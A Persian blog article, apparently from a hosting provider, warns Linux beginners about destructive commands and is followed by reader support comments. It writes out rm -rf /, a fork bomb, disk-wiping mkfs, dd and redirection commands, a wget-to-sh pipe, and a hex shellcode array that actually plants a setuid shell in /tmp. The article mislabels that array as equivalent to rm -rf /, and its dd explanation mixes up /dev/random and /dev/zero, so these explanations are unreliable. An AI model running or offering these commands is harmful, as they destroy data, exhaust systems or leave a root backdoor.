امنیتلینوکس و تاثیر آن در دنیای سیستم عامل ها

۸ کامند مرگبار که نباید هرگز در لینوکس اجرا کنید!

ترمینال لینوکس بسیار قدرتمند است و لینوکس در رابطه با اجرای یک کامند از شما تاییدیه نمی گیرد و به دستور شما Command را اجرا می کند. اما کامند چیست command line یا شل – خط دستور – در واقع راهی سریع و موثر برای برقراری تعامل است. ممکن است در ابتدای کار با لینوکس اشتباها دستوراتی را اجرا کنید که نتیجه آن نابودی سیستم عامل شما باشد. پس در این مقاله با ما همراه باشید تا کامند مرگبار در لینوکس که هرگز نباید اجرا شوند را بیاموزیم.

یاد گرفتن کامند هایی که شما را دچار مشکلات عدیده ای نظیر از بین رفتن سیستم عامل در توزیع های لینوکس می کنند باعث می شود که از حربه های کسانی که برای سرگرمی و شیطنت آنها را در دستورات لینوکس پیشنهاد می دهند در امان بمانید. این مقاله یک مقاله کامل نیست و ممکن است command هایی که در اینجا یاد می شود با دستورات دیگری در یک خط قرار بگیرند و شما را دچار گمراهی کنند.

اولین نکته که باید توجه داشته باشید این است که اغلب دستورات زیر با دسترسی Root اجرا می شوند. پس اولین قدم امنیتی که می توانید بردارید این است که همیشه با دسترسی Root وارد ترمینال نشوید و در صورت لزوم از دستور Sudo برای گرفتن دسترسی Root استفاده کنید.

rm -rf / (به معنی پاک کردن همه چیز!)

کامند rm –rf / هر آن چیزی که در ریشه لینوکس شما یعنی دایرکتوری / هست را پاک می کند. این فایل ها عبارتند از فایل ها و فولدر های روی هارد دیسک سیستم شما و دستگاه های قابل حمل مانند فلش USB. برای اطلاع از

rm کامندی است که کار Remove را انجام می دهد و –rf به این معنیست که بصورت Recursive و Force (بدون پرسیدن مجدد) فایل ها را پاک کن. / هم به معنی دایرکتوری ریشه یا Root می باشد.

دستور مشابه rm –rf /

Command زیر دستور کاملا مشابه rm –rf / است که بصوت Hex در آمده است.

کامند لینوکس rm –rf

 

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

نمونه این دستور در اینترنت پیدا می شود که احتمالا گفته شده کار مثبتی انجام می دهد! توجه داشته باشید که هرگز کامندی را که نمی دانید چه کاری انجام می دهد اجرا نکنید.

کامند :(){ :|: & };:

کامند :(){ :|: & };: یک کامند ساده به نظر می رسد اما می تواند بسیار خطرناک باشد! این کامند یک bash function است.

این کاراکتر های کوتاه یک Function هستند که کار آن تولید یک نسخه کپی جدید از خودش است. این کار بصورت یک Loop انجام شده و آنقدر از خودش نسخه جدید تولید می کند که کل منابع CPU و RAM سرور شما را درگیر می کند تا سیستم به حالت Freeze فرو رود. از این دستور به عنوان یک حمله DoS و Fork Bomb نام برده می شود.

نکته: Bash function ها بسیار قدرتمند هستند، حتی اگر خیلی کوتاه باشند.

کامند مرگبار در لینوکس

 

mkfs.ext4 /dev/sda1 (فرمت کردن یک هارد دیسک)

فهمیدن کامند mkfs.ext4 /dev/sda1 خیلی ساده است.

Mkfs مخفف Make File System است به معنی ایجاد یک فایل سیستم جدید.

Ext4 یک نوع File System است.

/dev/sda1 مسیر اولین پارتیشن اولین هارد دیسک روی سرور است.

این دستور به این معنی است که کل پارتیشن اصلی را فرمت کنیم! مشابه این دستور در ویندوز فرمت کردن درایو C است. این دستور کل پارتیشن sda1 شما را پاک کرده و یک پارتیشن جدید با فایل سیستم ext4 میسازد.

نکته: در صورتی که کامندی را روی /dev/sd* اجزا می کنید دقت لازم را داشته باشید.

 

command > /dev/sda (نوشتن مستقیم محتوا در اولین هارد دیسک!)

دستور command > /dev/sda  (منظور از command هر دستوری است که به جای کلمه command می نشیند.) در واقع به این شکل است که یک کامند را اجرا می کند بعد با استفاده از کاراکتر > نتیجه دستور را در مسیر /dev/sda می نویسد. این نوشتن باعث می شود که اولین بایت های هارد دیسک که اطلاعات فایل سیستم در آن نوشته شده است دچار تخریب شوند و دیسک غیر قابل استفاده شود.

نکته: هرگز خروجی یک دستور را بصورت مستقیم در یک هارد دیسک ننویسید.

 کامند مرگبار در لینوکس command > /dev/sda

dd if=/dev/random of=/dev/sda (نوشتن محتوای غلط (معمولا ۰) در یک هارد دیسک)

دستور dd if=/dev/random of=/dev/sda  باعث می شود که کل محتوای هارد دیسک sda شما از بین برود.

دستور dd در لینوکس دو مقدار می گیرد که محتوای if را بصورت Low-Level در of کپی می کند. معمولا برای از بین بردن اطلاعات به صورتی که بازیابی آن توسط recovery ها غیر ممکن باشد از این کامند استفاده می شود. مسیر /dev/zero شامل محتوای ۰ است. این دستور باعث می شود تک تک بایت های هارد دیسک با کاراکتر ۰ پر شود.

نکته: دستور dd در لینوکس محتوا را از if به of کپی می کند مراقب باشید در of چه مسیری را وارد می کنید.

mv ~ /dev/null (move کردن Home Directory به یک سیاه چاله!)

مسیر /dev/null یک مسیر ویژه است. انتقال هر چیزی به این مسیر به معنی نابود کردن آن است. مسیر /dev/null مسیر یک سیاه چاله است که بازگشتی از آن وجود ندارد. کامند mv ~ /dev/null  کل محتویات پوشه شخصی شما را به سیاه چاله میفرستد و دیگر دسترسی به آن نخواهید داشت.

دستور mv عملیات move را انجام می دهد.

~ مسیر Home Directory شخصی است که لاگین کرده است.

/dev/null هم مسیرسیاه چاله است.

نکته: انتقال هر چیزی به مسیر /dev/null باعث نابودی آن می شود.

 

wget http://example.com/something -O – | sh (دانلود یک فایل و اجرای آن به عنوان یک Script)

دستور بالا یک اسکریپت را از اینترنت دانلود می کند و به محض اتمام دانلود ان را به عنوان یک Script اجرا می کند. این مساله می تواند زمانی خطرناک باشد که اطمینان از صحت عملکرد آن اسکریپت نداشته باشید.

کامند wget یک فایل را از اینترنت دانلود می کند.

http://example.com/something  مسیر فایلیست که در حال دانلود می باشد.

کاراکتر | (Pipe Line) خروجی دستور سمت چپ را به ورودی دستور سمت راست می فرستد.

Sh فایل را به عنوان یک Bash Script اجرا می کند.

نکته: هرگز اسکریپت های نامطمئن و ناشناخته را دانلود و اجرا نکنید.

امیدواریم با استفاده از این مقاله سیستم عامل لینوکسی خود را همواره از خطرات این چنینی حفظ نمایید.

مدیر بلاگ

مشخصات مدیر

‫۷ دیدگاه ها

  1. زمانی که به صورت لایو و از نسخه لینوکس بوت شده روی فلش استفاده میکنیم. درصورتی که از کامنت اشتباه استفاده کنیم. برای مثال دستورات مربوط به پاک کردن اطلاعات بدیم آیا برای اطلاعات روی هارد دیسک سیستم خطری وجود داره؟
    و یه سوال دیگه اینکه درصورتی که بخوایم تنظیماتی روی اوبونتو در نسخه لایو ذخیره کنیم آیا این اطلاعات روی همون فلش باقی میمونه یا نیاز داریم به فضای هارد دیسک دسترسی داشته باشه لینوکس؟

    1. با سلام
      در صورتیکه هارد دیسک خود را مانت کرده باشید و در مسیر فایل های خود داخل هارد دیسک دستور اجرا کنید منجر به حذف فایل ها می شود.
      در خصوص سوال دیگر شما به صورت عمومی هدف از استفاده ابونتو لایو روی فلش مموری این نیست که تغییرات سیستم عامل را روی آن ذخیره کنید ولی راهکار برای حفظ دیتا وجود دارد. جهت مشاهده روش اینکار کلمات کلیدی زیر را در گوگل جستجو کنید:
      ubuntu+live+usb+persistent

  2. سلام خسته نباشید
    ممنون از سایت ایران هاست بابت مقالات معتبر و مفیدی که میزاره.

    نسخه ای از لینوکس رو میخواستم که تو حوزه طراحی سایت استفاده کنم

  3. متاسفانه گاها بدون درک کامند چیست و ترمینال لینوکس چیست افراد با مطالعات سطحی دست به کد می شوند که آخرش به فنا رفتن سیستمه

  4. سلام و عرض خسته نباشید.
    من دچار مشکلی شدم که خیلی ممنون میشم اگر از راهنماییتون استفاده کنم.

    در حال نصب فایل ISO ویندوز ١٠ بر روی VBOX در سیستم عامل اصلی لینوکس بودم که سیستمم هنگ میکنه و من با دکمه پاور خاموش میکنم، قبلش هم یک هشدا از پر شدن حافظه root دریافت کردم.

    بعد از روشن کردن سیستم دائما بعد از وارد کردن پسوورد باز هم صفحه لاگین مجدد بالا میاد. DD که میگیرم زده dev/sda5 100% و available صفر است. ضمن اینکه سرچ زدم و دستورات clean رو خواستم اجرا کنم ولی زده sda5 mount شده، بعدش خواستم unmount کنم ولی باز هم ارور میده و موفق نشدم مشکل رو حل کنم.
    ممنون میشم اگر از تجربیاتتون استفاده کنم

    1. زمانی که sd شما mount شده و boot هم روی همین sd هست و اگر پارتیشن بندی شما lvm نباشه امکان ادیت کردن و افزایش سایز اون رو ندارید. ترجیحاً از rescue mode استفاده کنید.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

نوشته های مشابه

دکمه بازگشت به بالا